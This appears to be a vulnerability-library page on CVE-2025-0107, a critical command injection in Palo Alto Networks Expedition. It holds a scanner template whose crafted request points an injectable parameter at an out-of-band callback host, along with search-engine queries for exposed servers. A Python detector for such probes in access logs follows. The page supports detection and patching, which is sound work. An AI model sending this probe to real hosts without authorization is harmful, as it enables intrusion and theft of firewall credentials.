Palo Alto Networks Expedition - OS Command Injection

CVE-2025-0107
Verified

Description

An OS command injection vulnerability in Palo Alto Networks Expedition enables an unauthenticated attacker to run arbitrary OS commands as the www-data user in Expedition, which results in the disclosure of usernames, cleartext passwords, device configurations, and device API keys for firewalls running PAN-OS software.

Severity

Critical

CVSS Score

9.8

Exploit Probability

81%

Published Date

May 27, 2025

Template Author

iamnoooob, pdresearch

CVE-2025-0107.yaml
id: CVE-2025-0107

info:
  name: Palo Alto Networks Expedition - OS Command Injection
  author: iamnoooob,pdresearch
  severity: critical
  description: |
    An OS command injection vulnerability in Palo Alto Networks Expedition enables an unauthenticated attacker to run arbitrary OS commands as the www-data user in Expedition, which results in the disclosure of usernames, cleartext passwords, device configurations, and device API keys for firewalls running PAN-OS software.
  impact: |
    Unauthenticated attackers can execute arbitrary OS commands on Palo Alto Networks Expedition servers, leading to disclosure of sensitive firewall credentials, configurations, and API keys that could compromise all connected PAN-OS firewalls.
  remediation: |
    Upgrade to the latest patched version of Palo Alto Networks Expedition as specified in the vendor security advisory.
  reference:
    - https://security.paloaltonetworks.com/PAN-SA-2025-0001
    - https://ssd-disclosure.com/ssd-advisory-palo-alto-expedition-rce-regionsdiscovery/
    - https://nvd.nist.gov/vuln/detail/CVE-2025-0107
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    epss-score: 0.8102
    epss-percentile: 0.99128
  metadata:
    verified: true
    max-request: 1
    shodan-query: title:"Expedition"
    fofa-query: title=="Expedition Project"
  tags: cve,cve2025,rce,paloalto,expedition,vkev,vuln

http:
  - raw:
      - |
        GET /API/regionsDiscovery.php?master=spark%3A%2F%2F{{interactsh-url}}:443&mask=26&project=your_project&devices=device1%2Cdevice2&mtserver=127.0.0.1%3A3306&mtuser=root&mtpassword=paloalto&task-id=1193&mode=pre-analysis&regions=&parquetPath=%2Ftmp&timezone=Europe%2FHelsinki&mlserver=127.0.0.1&debug=false&initDate=2023-01-01&endDate=2023-01-31 HTTP/1.1
        Host: {{Hostname}}

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - 'msg":"Started'
          - '"success":true'
        condition: and

      - type: word
        part: interactsh_protocol
        words:
          - "dns"
# digest: 490a00463044022027d3945218021a4d8a73ca8139f8cb41764ec74ebf9babaf45c5cd472d9c8ebe022027e2cb77ec7690a3da5f8bc6e68e0261e0a28c4d1671eecb91f248100bed4dd9:922c64590222798bb761d5b6d8e72950
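The template above detects this flaw by requesting /API/regionsDiscovery.php with an out-of-band spark:// master and confirming a DNS callback. As an added example that is not part of the template, the library, or the vendor's code, the following Python flags the same request shape in web server access logs after the fact; the log lines and the trusted-master list are constructed assumptions.

```python
import re
from urllib.parse import urlparse, parse_qs

ENDPOINT = "/API/regionsDiscovery.php"
# Assumption: only an in-host Spark master is legitimate on this deployment.
TRUSTED_MASTERS = {"127.0.0.1", "localhost"}
# Apache/nginx "combined" format: client, timestamp, request line, status, size.
LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+) [^"]*" (\d{3}) (\S+)')

def check_line(line):
    """Return a finding dict for a request to the regionsDiscovery endpoint,
    or None. Severity is 'high' when the 'master' parameter carries a spark://
    URL whose host is not a trusted master (the template's probe signature)."""
    m = LOG_RE.match(line)
    if not m:
        return None
    client, ts, _method, target, status, _size = m.groups()
    parsed = urlparse(target)
    if parsed.path != ENDPOINT:
        return None
    # parse_qs already percent-decodes, so spark%3A%2F%2F... becomes spark://...
    master = parse_qs(parsed.query).get("master", [""])[0]
    master_host = urlparse(master).hostname if master.startswith("spark://") else None
    external = master_host is not None and master_host not in TRUSTED_MASTERS
    return {
        "client": client,
        "time": ts,
        "status": int(status),
        "master_host": master_host,
        "severity": "high" if external else "medium",
    }

def scan(lines):
    """Run check_line over every log line and keep the findings."""
    return [f for f in (check_line(l) for l in lines) if f]

# Constructed sample log lines (not real traffic): one probe with an external
# callback host, one request with the local master, one unrelated request.
SAMPLE_LOG = [
    '203.0.113.7 - - [27/May/2025:10:15:32 +0000] "GET /API/regionsDiscovery.php'
    '?master=spark%3A%2F%2Fcallback.oast.example%3A443&mask=26&project=p HTTP/1.1" 200 57 "-" "Mozilla/5.0"',
    '10.0.0.5 - - [27/May/2025:10:16:01 +0000] "GET /API/regionsDiscovery.php'
    '?master=spark%3A%2F%2F127.0.0.1%3A7077&mask=26 HTTP/1.1" 200 57 "-" "curl/8.0"',
    '10.0.0.6 - - [27/May/2025:10:17:00 +0000] "GET /index.php HTTP/1.1" 200 1234 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for finding in scan(SAMPLE_LOG):
        print(finding)
```

Any hit on this endpoint from an unauthenticated client is worth reviewing on an unpatched host, which is why the local-master case is still reported at medium severity.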
CVSS Metrics

CVSS Vector:
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

References

https://security.paloaltonetworks.com/PAN-SA-2025-0001
https://ssd-disclosure.com/ssd-advisory-palo-alto-expedition-rce-regionsdiscovery/
https://nvd.nist.gov/vuln/detail/CVE-2025-0107

Remediation Steps

Upgrade to the latest patched version of Palo Alto Networks Expedition as specified in the vendor security advisory.